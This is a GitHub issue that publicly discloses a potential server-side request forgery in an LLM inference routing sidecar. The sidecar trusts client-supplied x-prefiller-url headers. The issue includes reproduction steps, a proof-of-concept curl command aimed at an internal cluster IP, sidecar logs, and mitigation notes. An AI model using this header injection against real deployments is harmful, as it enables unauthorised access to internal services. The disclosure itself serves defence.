Skip to content

Potential SSRF via x-prefiller-url or x-prefiller-host-port header #242

@pierDipi

Description

@pierDipi

Disclaimer

Since the project is new and I've not seen any responsible disclosure process documented (as stated here https://llm-d.ai/docs/community/contribute#security), I'm creating a public issue in the hope that many are still only experimenting with llm-d and it's not affecting their production setup.

Problem

There is a potential for Server-Side Request Forgery (SSRF).

The routing sidecar honors the x-prefiller-url and x-prefiller-host-port headers, however, I'd expect the header to not be passed through by the scheduler or Gateway (at least) from external, user-provided requests.

This allows a malicious external user to craft a request that forces the sidecar to forward the prefill stage of the request to an arbitrary URL or host:port. This bypasses the intended routing logic managed by the scheduler.

To Reproduce

  1. Deploy a model fronted by Gateway and the inference scheduler on a cluster (e.g., KinD).
  2. Send a POST request to the model's inference endpoint via the gateway.
  3. In the request, include the header x-prefiller-url pointing to an arbitrary internal service address.
  4. Observe that the request is successfully processed by the unintended service.

Example curl command

The following command was sent to the gateway at 172.18.0.3. It includes the x-prefiller-url header, which points to an arbitrary internal IP http://10.244.0.51:8000. The request succeeds with a 200 OK status, indicating the sidecar forwarded the request as instructed by the header.

curl -v -XPOST \
-H "x-prefiller-url: http://10.244.0.51:8000" \
-H "Content-Type: application/json" \
-d '{"model": "facebook/opt-125m", "prompt": "Write a poem about colors...", "stream": false, "max_tokens": 400}' \
http://172.18.0.3/default/facebook-opt-125m-pd/v1/completions

and you will see logs like these for the sidecar:

I0703 09:55:11.606604       1 chat_completions.go:310] "sending request to prefiller" logger="proxy server" url="http://10.244.0.51:8000/" body="{\"do_remote_decode\":true,\"max_tokens\":400,\"model\":\"facebook/opt-125m\",\"prompt\":\"Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, a very long one please\",\"stream\":false}"
I0703 09:55:12.898331       1 chat_completions.go:334] "warning: missing 'remote_block_ids' field in prefiller response" logger="proxy server"
I0703 09:55:12.898347       1 chat_completions.go:340] "warning: missing 'remote_engine_id' field in prefiller response" logger="proxy server"
I0703 09:55:12.898351       1 chat_completions.go:346] "warning: missing 'remote_host' field in prefiller response" logger="proxy server"
I0703 09:55:12.898355       1 chat_completions.go:352] "warning: missing 'remote_port' field in prefiller response" logger="proxy server"
I0703 09:55:12.898361       1 chat_completions.go:355] "received prefiller response" logger="proxy server" remote_block_ids=null remote_engine_id=null remote_host=null remote_port=null
I0703 09:55:12.898389       1 chat_completions.go:393] "sending request to decoder" logger="proxy server" body="{\"do_remote_prefill\":true,\"max_tokens\":400,\"model\":\"facebook/opt-125m\",\"prompt\":\"Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, a very long one please\",\"remote_block_ids\":null,\"remote_engine_id\":null,\"remote_host\":null,\"remote_port\":null,\"stream\":false}"

Notes

  • Egress network policy can mitigate the issue for external and cluster internal traffic (however, it's not very simple to configure OOTB as vllm needs to connect to HF, etc to download the model(s))
  • Unclear if an HTTPRoute filter that removes the header would mitigate the issue and not break the P/D functionality since filters are applied before the "action" (I'm not sure what that means in the context of InferencePool and ExtProc)

Metadata

Metadata

Assignees

Labels

No labels
No labels

Type

No type

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions